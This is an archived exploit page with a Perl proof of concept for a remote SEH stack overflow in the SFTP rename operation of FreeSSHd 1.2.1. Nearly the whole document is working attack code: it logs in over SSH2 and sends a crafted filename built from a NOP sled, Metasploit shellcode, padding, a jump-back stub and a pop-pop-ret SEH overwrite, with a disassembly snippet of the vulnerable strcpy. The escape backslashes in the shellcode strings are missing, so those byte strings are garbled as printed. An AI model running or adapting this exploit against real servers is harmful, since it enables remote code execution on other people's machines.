FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit (SEH)
# Published : 2009-03-27
# Author : r0ut3r
# Previous Title : Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow Exploit
# Next Title : Femitter FTP Server 1.x Multiple Vulnerabilities (post auth)

# FreeSSHd 1.2.1 (rename) Remote Buffer Overflow Exploit
#
# Advisory: http://www.bmgsec.com.au/advisory/45/
# Original: http://www.bmgsec.com.au/advisory/32/
# Related : http://www.bmgsec.com.au/advisory/42/
#
# Test box: WinXP Pro SP2 English
#
# Exploit code for a vulnerability I discovered sometime
# ago in FreeSSHd 1.2.1. This code should be run from a 
# user titled "root", or adjust the payload for your 
# username. I've left space for adjustments. Up to the
# first six NOPs can be used (inclusive). 
#
# The code exploits a vulnerability in the SFTP Rename
# operation. The vulnerability was patched in 1.2.2
#
# 00416F98  50             PUSH EAX                      
# 00416F99  8D85 B8FEFFFF  LEA EAX,DWORD PTR SS:[EBP-148]
# 00416F9F  50             PUSH EAX                      
# 00416FA0  E8 45B50400    CALL <JMP.&MSVCRT.strcpy>     
#
#
# Written and discovered by:
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)

use Net::SSH2;

my $user = "root";
my $pass = "yahh";

my $ip = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!n";
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentialsn";
print "[+] Sending payloadn";

$nop = "x90";
$padding = 'A' x 105;

my $SEH = "x21x11x40x00"; # pop, pop, ret - 0x00401121 (Universal - freeSSHdServer.exe)
my $nextSEH = "xEBxF0x90x90"; # jmp short 240, nop, nop

$mShellcode = "xE9xF2xFExFFxFF";

# win32_exec -  EXITFUNC=process CMD=calc Size=160 Encoder=PexFnstenvSub - metasploit.com
my $shellcode =
"x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x02".
"x28x29x10x83xebxfcxe2xf4xfexc0x6dx10x02x28xa2x55".
"x3exa3x55x15x7ax29xc6x9bx4dx30xa2x4fx22x29xc2x59".
"x89x1cxa2x11xecx19xe9x89xaexacxe9x64x05xe9xe3x1d".
"x03xeaxc2xe4x39x7cx0dx14x77xcdxa2x4fx26x29xc2x76".
"x89x24x62x9bx5dx34x28xfbx89x34xa2x11xe9xa1x75x34".
"x06xebx18xd0x66xa3x69x20x87xe8x51x1cx89x68x25x9b".
"x72x34x84x9bx6ax20xc2x19x89xa8x99x10x02x28xa2x78".
"x3ex77x18xe6x62x7exa0xe8x81xe8x52x40x6ax56xf1xf2".
"x71x40xb1xeex88x26x7exefxe5x4bx48x7cx61x28x29x10";

my $payload = $nop x 6 . $shellcode . $padding . $mShellcode . $nop x 9 . $nextSEH . $SEH;

my $sftp = $ssh2->sftp();
$sftp->rename($payload, 'B');

print "[+] Sent";
$ssh2->disconnect;

# www.Syue.com [2009-03-27]